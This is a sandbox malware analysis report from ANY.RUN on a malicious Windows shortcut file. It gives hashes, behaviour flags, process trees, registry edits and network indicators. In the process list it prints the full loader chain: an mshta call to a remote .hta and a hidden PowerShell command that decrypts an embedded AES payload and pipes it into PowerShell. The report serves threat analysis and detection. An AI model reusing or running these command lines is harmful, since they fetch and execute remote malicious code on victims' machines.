analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ITEMS -98765456.lnk

Full analysis: https://app.any.run/tasks/5a51d459-6caa-47dd-9b27-715ca2ec92bb
Verdict: Malicious activity
Analysis date: December 26, 2023, 05:55:18
OS: Windows 11 Professional (build: 22000, 64 bit)
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=13, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
MD5:

8D35E46911450C731F76F311BAAD7EF0

SHA1:

AE1D21E7C501CDE5631971A39349B4A18CB52A7F

SHA256:

1BF287BAF71F2A0872005E73399685DF6B3A2B27CB2F27511DEB4BDF566FBE67

SSDEEP:

12:8eUm/3BVSXvk44X3ojsqzKtnWNYyW+UcCsvXhrelOG5zbdpYrn1IlI5u9bOVn1IJ:8s/BHYVKVW+r+/CWtYOodd79dsHmBn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4112)

    • Scans artifacts that could help determine the target

      • mshta.exe (PID: 3604)

    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 3604)

  • SUSPICIOUS

    • Base64-obfuscated command line is found

      • mshta.exe (PID: 3604)
      • cmd.exe (PID: 5340)

    • Suspicious use of symmetric encryption in PowerShell

      • mshta.exe (PID: 3604)
      • cmd.exe (PID: 5340)

    • Reads the Internet Settings

      • mshta.exe (PID: 3604)
      • powershell.exe (PID: 4112)
      • powershell.exe (PID: 5936)

    • Access the System.Security .NET namespace (SCRIPT)

      • mshta.exe (PID: 3604)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 5340)
      • mshta.exe (PID: 3604)

    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 3604)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 4112)

    • Powershell scripting: start process

      • mshta.exe (PID: 3604)

    • The Powershell connects to the Internet

      • powershell.exe (PID: 5936)

    • Unusual connection from system programs

      • powershell.exe (PID: 5936)

  • INFO

    • Checks proxy server information

      • mshta.exe (PID: 3604)
      • powershell.exe (PID: 5936)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 3604)

    • Checks supported languages

      • acrobat_sl.exe (PID: 2432)

    • Application launched itself

      • Acrobat.exe (PID: 5248)
      • AcroCEF.exe (PID: 3676)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

IconFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
CommandLineArguments: \W*\\\*2\\\msh*e ('http'+'://thanhancompany.com/ta/line'+'.hta')
RelativePath: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Description: line
TargetFileDOSName: powershell.exe
HotKey: (none)
RunWindow: Show Minimized No Activate
IconIndex: 13
TargetFileSize: -
FileAttributes: (none)
Flags: IDList, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
123
Monitored processes
25
Malicious processes
1
Suspicious processes
4

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs mshta.exe powershell.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe acrobat.exe acrobat.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs adobearm.exe acrobat_sl.exe no specs acrocef.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1768"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" \W*\\\*2\\\msh*e ('http'+'://thanhancompany.com/ta/line'+'.hta')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2596\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
3604"C:\Windows\System32\mshta.exe" http://thanhancompany.com/ta/line.htaC:\Windows\System32\mshta.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\wldp.dll
c:\windows\system32\mshtml.dll
4112"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $lQDGqRYO = 'AAAAAAAAAAAAAAAAAAAAAHDMFFr4TQjK1c7L+nJlzUiYo5VGy78t3YPii+fwvaB0CLH1qjrp4HxCT9XFZI9uzeVMMRmrR74VbKxaYqjdGMf84OZpd4IgPgqmgJIPDUYcTMqEB8EKnkcXlBQc65XVLu7sHhDAVYiFg+wR5R9IO7VERDScrW/Y9pII6W+i+h/c7dg5t7PXqGS2A8kK3Qj6jzoagZSSJdvXGMa/7ImW/TWvrKmRWTEECLJxQjKpe3cFIAMos/z2zJXLcBPGbZoyv9i01DCwSHm1AT8jyWF+s3Ptaw/jePExY9n71SUPNX78CCgphH3OzFg0G13+t4JzuAjjHNloSgDpBC0IFy5DWZ8CUYa6TbNRkKGbsQRVKYfSTbPcgjHKxgNgB64/CmIwOdbYQNqa/VnFxV1p0uhd6umgZBz+K0W2djHcbInuCBj4q4MaoxLsAGEgb4mRmCCPsG/ybt0gy+YKNJTZZp9n5RT4+civpZ4MYa/ccoQgSoUYeOJgUUOWMc2i4Q6xa8VerH94Mtt9mY7zro3PEaCil8EmZyYFvyDl7Ig3dRHQGONM8a0ReJtuzAxcxMPaInwD39QxQxxQ3n+7aXSXvNCbWpYvQ33IxeCGmV8KsxwkGFr9oYe1mXnC5M5rghRP6arH1kQtVFIoz5fXy/9fdIJjwzgfBN8H/X+ak1sQ8GhGuDKtIOAOVlIDVwMyuHxhLItRhN969cbURkpIwHvgAWC7ya/+7JrtQxLtwgcnvUqGvZMoidwPqmmHcQG72PLRtsA0gCnyKKGGK0DpDuDXXxdDLSejThngg87qpP1lJFcqWx0J/D2hIqlHIk2WHie9jzHOSP7kiSSq76FcgFMtd0fARxU/BJQGS/Y1W1UbayVkJm3kN1Iknx2eVJn4bVUc0GIjW+/M+qKi1H+DgQVAH/Gn1MklNjpGFOGc3vVu33uuevScf3hErFrdMHFjSuH+ILLxCDEEmObgxRnjW14ANsi/OOo=';$YvfBZo = 'cGJXc2ZaZWFKZ1phem9iaHp4cHlWdGtwWXpXWkFUb3I=';$qEyXZKV = New-Object 'System.Security.Cryptography.AesManaged';$qEyXZKV.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qEyXZKV.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qEyXZKV.BlockSize = 128;$qEyXZKV.KeySize = 256;$qEyXZKV.Key = [System.Convert]::FromBase64String($YvfBZo);$XWdmE = [System.Convert]::FromBase64String($lQDGqRYO);$HQkxvexs = $XWdmE[0..15];$qEyXZKV.IV = $HQkxvexs;$vFnUpSgaO = $qEyXZKV.CreateDecryptor();$YVtuKtCCl = $vFnUpSgaO.TransformFinalBlock($XWdmE, 16, $XWdmE.Length - 16);$qEyXZKV.Dispose();$ASJv = New-Object System.IO.MemoryStream( , $YVtuKtCCl );$mbWdpsh = New-Object System.IO.MemoryStream;$nprYzEcjd = New-Object System.IO.Compression.GzipStream $ASJv, ([IO.Compression.CompressionMode]::Decompress);$nprYzEcjd.CopyTo( $mbWdpsh );$nprYzEcjd.Close();$ASJv.Close();[byte[]] $jWJejyDQ = $mbWdpsh.ToArray();$axWiuKqH = [System.Text.Encoding]::UTF8.GetString($jWJejyDQ);$axWiuKqH | powershell - }C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1672\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
5340"C:\Windows\system32\cmd.exe" /c powershell.exe $lQDGqRYO = 'AAAAAAAAAAAAAAAAAAAAAHDMFFr4TQjK1c7L+nJlzUiYo5VGy78t3YPii+fwvaB0CLH1qjrp4HxCT9XFZI9uzeVMMRmrR74VbKxaYqjdGMf84OZpd4IgPgqmgJIPDUYcTMqEB8EKnkcXlBQc65XVLu7sHhDAVYiFg+wR5R9IO7VERDScrW/Y9pII6W+i+h/c7dg5t7PXqGS2A8kK3Qj6jzoagZSSJdvXGMa/7ImW/TWvrKmRWTEECLJxQjKpe3cFIAMos/z2zJXLcBPGbZoyv9i01DCwSHm1AT8jyWF+s3Ptaw/jePExY9n71SUPNX78CCgphH3OzFg0G13+t4JzuAjjHNloSgDpBC0IFy5DWZ8CUYa6TbNRkKGbsQRVKYfSTbPcgjHKxgNgB64/CmIwOdbYQNqa/VnFxV1p0uhd6umgZBz+K0W2djHcbInuCBj4q4MaoxLsAGEgb4mRmCCPsG/ybt0gy+YKNJTZZp9n5RT4+civpZ4MYa/ccoQgSoUYeOJgUUOWMc2i4Q6xa8VerH94Mtt9mY7zro3PEaCil8EmZyYFvyDl7Ig3dRHQGONM8a0ReJtuzAxcxMPaInwD39QxQxxQ3n+7aXSXvNCbWpYvQ33IxeCGmV8KsxwkGFr9oYe1mXnC5M5rghRP6arH1kQtVFIoz5fXy/9fdIJjwzgfBN8H/X+ak1sQ8GhGuDKtIOAOVlIDVwMyuHxhLItRhN969cbURkpIwHvgAWC7ya/+7JrtQxLtwgcnvUqGvZMoidwPqmmHcQG72PLRtsA0gCnyKKGGK0DpDuDXXxdDLSejThngg87qpP1lJFcqWx0J/D2hIqlHIk2WHie9jzHOSP7kiSSq76FcgFMtd0fARxU/BJQGS/Y1W1UbayVkJm3kN1Iknx2eVJn4bVUc0GIjW+/M+qKi1H+DgQVAH/Gn1MklNjpGFOGc3vVu33uuevScf3hErFrdMHFjSuH+ILLxCDEEmObgxRnjW14ANsi/OOo=';$YvfBZo = 'cGJXc2ZaZWFKZ1phem9iaHp4cHlWdGtwWXpXWkFUb3I=';$qEyXZKV = New-Object 'System.Security.Cryptography.AesManaged';$qEyXZKV.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qEyXZKV.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qEyXZKV.BlockSize = 128;$qEyXZKV.KeySize = 256;$qEyXZKV.Key = [System.Convert]::FromBase64String($YvfBZo);$XWdmE = [System.Convert]::FromBase64String($lQDGqRYO);$HQkxvexs = $XWdmE[0..15];$qEyXZKV.IV = $HQkxvexs;$vFnUpSgaO = $qEyXZKV.CreateDecryptor();$YVtuKtCCl = $vFnUpSgaO.TransformFinalBlock($XWdmE, 16, $XWdmE.Length - 16);$qEyXZKV.Dispose();$ASJv = New-Object System.IO.MemoryStream( , $YVtuKtCCl );$mbWdpsh = New-Object System.IO.MemoryStream;$nprYzEcjd = New-Object System.IO.Compression.GzipStream $ASJv, ([IO.Compression.CompressionMode]::Decompress);$nprYzEcjd.CopyTo( $mbWdpsh );$nprYzEcjd.Close();$ASJv.Close();[byte[]] $jWJejyDQ = $mbWdpsh.ToArray();$axWiuKqH = [System.Text.Encoding]::UTF8.GetString($jWJejyDQ);$axWiuKqH | powershell - C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
3876\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
4288powershell.exe $lQDGqRYO = 'AAAAAAAAAAAAAAAAAAAAAHDMFFr4TQjK1c7L+nJlzUiYo5VGy78t3YPii+fwvaB0CLH1qjrp4HxCT9XFZI9uzeVMMRmrR74VbKxaYqjdGMf84OZpd4IgPgqmgJIPDUYcTMqEB8EKnkcXlBQc65XVLu7sHhDAVYiFg+wR5R9IO7VERDScrW/Y9pII6W+i+h/c7dg5t7PXqGS2A8kK3Qj6jzoagZSSJdvXGMa/7ImW/TWvrKmRWTEECLJxQjKpe3cFIAMos/z2zJXLcBPGbZoyv9i01DCwSHm1AT8jyWF+s3Ptaw/jePExY9n71SUPNX78CCgphH3OzFg0G13+t4JzuAjjHNloSgDpBC0IFy5DWZ8CUYa6TbNRkKGbsQRVKYfSTbPcgjHKxgNgB64/CmIwOdbYQNqa/VnFxV1p0uhd6umgZBz+K0W2djHcbInuCBj4q4MaoxLsAGEgb4mRmCCPsG/ybt0gy+YKNJTZZp9n5RT4+civpZ4MYa/ccoQgSoUYeOJgUUOWMc2i4Q6xa8VerH94Mtt9mY7zro3PEaCil8EmZyYFvyDl7Ig3dRHQGONM8a0ReJtuzAxcxMPaInwD39QxQxxQ3n+7aXSXvNCbWpYvQ33IxeCGmV8KsxwkGFr9oYe1mXnC5M5rghRP6arH1kQtVFIoz5fXy/9fdIJjwzgfBN8H/X+ak1sQ8GhGuDKtIOAOVlIDVwMyuHxhLItRhN969cbURkpIwHvgAWC7ya/+7JrtQxLtwgcnvUqGvZMoidwPqmmHcQG72PLRtsA0gCnyKKGGK0DpDuDXXxdDLSejThngg87qpP1lJFcqWx0J/D2hIqlHIk2WHie9jzHOSP7kiSSq76FcgFMtd0fARxU/BJQGS/Y1W1UbayVkJm3kN1Iknx2eVJn4bVUc0GIjW+/M+qKi1H+DgQVAH/Gn1MklNjpGFOGc3vVu33uuevScf3hErFrdMHFjSuH+ILLxCDEEmObgxRnjW14ANsi/OOo=';$YvfBZo = 'cGJXc2ZaZWFKZ1phem9iaHp4cHlWdGtwWXpXWkFUb3I=';$qEyXZKV = New-Object 'System.Security.Cryptography.AesManaged';$qEyXZKV.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qEyXZKV.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qEyXZKV.BlockSize = 128;$qEyXZKV.KeySize = 256;$qEyXZKV.Key = [System.Convert]::FromBase64String($YvfBZo);$XWdmE = [System.Convert]::FromBase64String($lQDGqRYO);$HQkxvexs = $XWdmE[0..15];$qEyXZKV.IV = $HQkxvexs;$vFnUpSgaO = $qEyXZKV.CreateDecryptor();$YVtuKtCCl = $vFnUpSgaO.TransformFinalBlock($XWdmE, 16, $XWdmE.Length - 16);$qEyXZKV.Dispose();$ASJv = New-Object System.IO.MemoryStream( , $YVtuKtCCl );$mbWdpsh = New-Object System.IO.MemoryStream;$nprYzEcjd = New-Object System.IO.Compression.GzipStream $ASJv, ([IO.Compression.CompressionMode]::Decompress);$nprYzEcjd.CopyTo( $mbWdpsh );$nprYzEcjd.Close();$ASJv.Close();[byte[]] $jWJejyDQ = $mbWdpsh.ToArray();$axWiuKqH = [System.Text.Encoding]::UTF8.GetString($jWJejyDQ);$axWiuKqH C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
5936powershell - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5248"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\admin\AppData\Roaming\blank.pdf"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
powershell.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe Acrobat
Version:
22.3.20314.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrobat.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
Total events
34 002
Read events
33 943
Write events
59
Delete events
0

Modification events

(PID) Process:(3604) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3604) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3604) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3604) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(3604) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(3604) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(4112) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(4112) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(4112) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(4112) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
1
Suspicious files
193
Text files
26
Unknown types
0

Dropped files

PID
Process
Filename
Type
1768powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\687327458b419381.customDestinations-msbinary
MD5:677A49DC085EDD7387ECB03E135ADBB5
SHA256:E40BA42416E477828DCA40BE4DC0994369DD833111064982C9011BE914E98B19
5740Acrobat.exeC:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEventsbinary
MD5:7C6A6628A0A5B1B5B3AA2F9239E29F2D
SHA256:F3AEBCBC1B0B5882AF7ABC9773D572BB034B85064F1899A9BA2595E246FA817E
5740Acrobat.exeC:\Users\admin\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txttext
MD5:E8A0E814D14CB38706064C3AC221964E
SHA256:77C1E1313CF8CBA6916CA38376F7FDD686904BC1A7E82BF915C3A021A7CE43B4
5936powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_p55xjyaw.bgn.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5936powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactivebinary
MD5:D00A8AF03A836462008E0D3333DEF4E9
SHA256:89C824B8D7FA2B5EEAECD64D1E7071B01B338D99AA2F41997838A866E8B32C2C
5740Acrobat.exeC:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalbinary
MD5:693CD8A0C3142CF9696FDD8B62B4B854
SHA256:DA71C5AA40F4E46E44DDA53FBC305059C00CF35F11C42A2E3A86AE5FF1643A28
4112powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cz0s3euc.gqd.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4288powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_m0ghyftm.pfi.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3604mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\J0KBFYBW\line[1].htahtml
MD5:D88EE271FCA9CC237C2C5A8EFCC744DB
SHA256:C6A12DB1CCEA2FB030FD79DEA7D4862425C84E8FBD898A7612CF2B3763CF5AD6
1768powershell.exeC:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logtext
MD5:22A211C7775353262CAAAB01735EFE53
SHA256:784143DEB0249B193742925C306F392EF3EFC7D435ADD85895F7A4B09005695F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
33
DNS requests
19
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5248
Acrobat.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTk45WiKdPUwcMf8JgMC07ACYqr2AQUt2ui6qiqhIx56rTaD5iyxZV2ufQCEAWz1NCckkaDRqU%2FRpuMnaA%3D
unknown
binary
471 b
unknown
3884
smartscreen.exe
GET
200
93.184.221.240:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?13b41378fce6cd72
unknown
compressed
4.66 Kb
unknown
5248
Acrobat.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbY2QTVWENG9oovp1QifsQ%3D
unknown
binary
471 b
unknown
3884
smartscreen.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D
unknown
binary
471 b
unknown
1412
svchost.exe
GET
200
2.21.20.140:80
http://www.msftconnecttest.com/connecttest.txt
unknown
text
22 b
unknown
3752
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
binary
471 b
unknown
3604
mshta.exe
GET
200
192.185.191.127:80
http://thanhancompany.com/ta/line.hta
unknown
html
55.6 Kb
unknown
2476
AdobeARM.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA6bGI750C3n79tQ4ghAGFo%3D
unknown
binary
471 b
unknown
2476
AdobeARM.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rhvv%2BYXsIiGX0TkICEARSlvj82CmnXclClPWkFaQ%3D
unknown
binary
727 b
unknown
2476
AdobeARM.exe
GET
200
23.48.23.54:80
http://acroipm2.adobe.com/assets/Owner/arm/2023/12/UC/Rdr.txt
unknown
text
4 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4588
svchost.exe
239.255.255.250:1900
whitelisted
2864
svchost.exe
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3884
smartscreen.exe
20.31.251.109:443
checkappexec.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
1412
svchost.exe
2.21.20.155:80
Akamai International B.V.
DE
unknown
3884
smartscreen.exe
93.184.221.240:80
ctldl.windowsupdate.com
EDGECAST
GB
whitelisted
3884
smartscreen.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
3604
mshta.exe
192.185.191.127:80
thanhancompany.com
UNIFIEDLAYER-AS-1
US
unknown
5944
svchost.exe
184.30.17.174:443
fs.microsoft.com
AKAMAI-AS
DE
unknown
6112
OfficeC2RClient.exe
52.109.89.18:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
5936
powershell.exe
167.99.136.52:443
mag.wcoomd.org
DIGITALOCEAN-ASN
DE
unknown

DNS requests

Domain
IP
Reputation
checkappexec.microsoft.com
  • 20.31.251.109
whitelisted
ctldl.windowsupdate.com
  • 93.184.221.240
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
thanhancompany.com
  • 192.185.191.127
unknown
mag.wcoomd.org
  • 167.99.136.52
unknown
hiqsolution.com
  • 217.199.187.191
malicious
cc-api-data.adobe.io
  • 54.195.71.107
  • 34.250.67.152
  • 54.194.243.238
whitelisted
geo2.adobe.com
  • 23.35.236.137
whitelisted
p13n.adobe.io
  • 52.22.41.97
  • 52.6.155.20
  • 3.219.243.226
  • 3.233.129.217
whitelisted
login.live.com
  • 20.190.159.64
  • 40.126.31.71
  • 20.190.159.75
  • 20.190.159.73
  • 20.190.159.23
